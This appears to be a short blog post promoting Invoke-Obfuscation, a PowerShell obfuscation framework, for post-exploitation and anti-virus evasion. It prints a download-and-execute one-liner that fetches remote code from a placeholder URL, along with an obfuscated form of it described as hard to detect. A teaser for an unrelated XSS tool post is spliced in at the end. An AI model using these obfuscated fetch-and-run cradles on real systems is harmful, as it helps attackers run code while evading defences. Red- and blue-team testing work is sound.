Invoke-Obfuscation: A PowerShell Command & Script Obfuscator!

This is a short post about a cool PowerShell script – Invoke-Obfuscation that can help us a lot post exploitation. Why PowerShell? It is because, this shell and scripting language is already present on most modern Windows operating systems. It also has memory only execution capabilities that can help you evade anti-viruses and the likes, with almost no logging in the eventlog! Imagine if you are able to execute PowerSploit, obfuscating all your “stuff”!


Commonly, PowerShell as such accepts a EncodedCommand parameter, which is a way to pass DOS-unfriendly commands to be safely passed for execution. However, if you plan to use it for post-exploitation activities, it is detected by most anti-virus vendors. A way around this is to use Invoke-Obfuscation, which employs simple techniques to help you bypass detection.

What is Invoke-Obfuscation?

Invoke-Obfuscation is an open source obfuscation framework in PowerShell that helps you obfuscate PowerShell v2.0+ commands and scripts. If you are on the blue-side of the team, then you can use it to test your anti-virus solution. For downloading files on the remote host, you might use something like this:

Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://url_to_file/file")

If you were to run this through Invoke-Obfuscation, you get an output similar to the following:

((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}."`I`N`V`o`k`e`C`o`m`m`A`N`d").  "`N`e`w`S`c`R`i`p`T`B`l`o`c`k"((& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tp://url_to_file/file')))

This is now difficult for anti-virus vendors to detect. Currently, it allows you to encode the following in ASCII, HEX, Octal, Binary, SecureString (AES) or BXOR encoding formats:

  1. TOKEN – Obfuscate PowerShell command Tokens
  2. STRING – Obfuscate entire command as a String
  3. ENCODING – Obfuscate entire command via Encoding
  4. LAUNCHER – Obfuscate command args w/Launcher techniques (run once at end)

I like the AES encoding functionality in this tool. For example,

C:PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive



Interested in giving this a shot?

Invoke-Obfuscation Installation:

Download the framework first. Then, uncompress the files to a directory and run the following and thy will be done:

Import-Module ./Invoke-Obfuscation.psd1

My initial post about this advanced XSS detection and exploitation suite was almost an year ago! Three days ago, an update – XSStrike 3.1.2 was released. This is a post that documents these changes. What is XSStrike? XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator,

You Might Also Like

Leave a Reply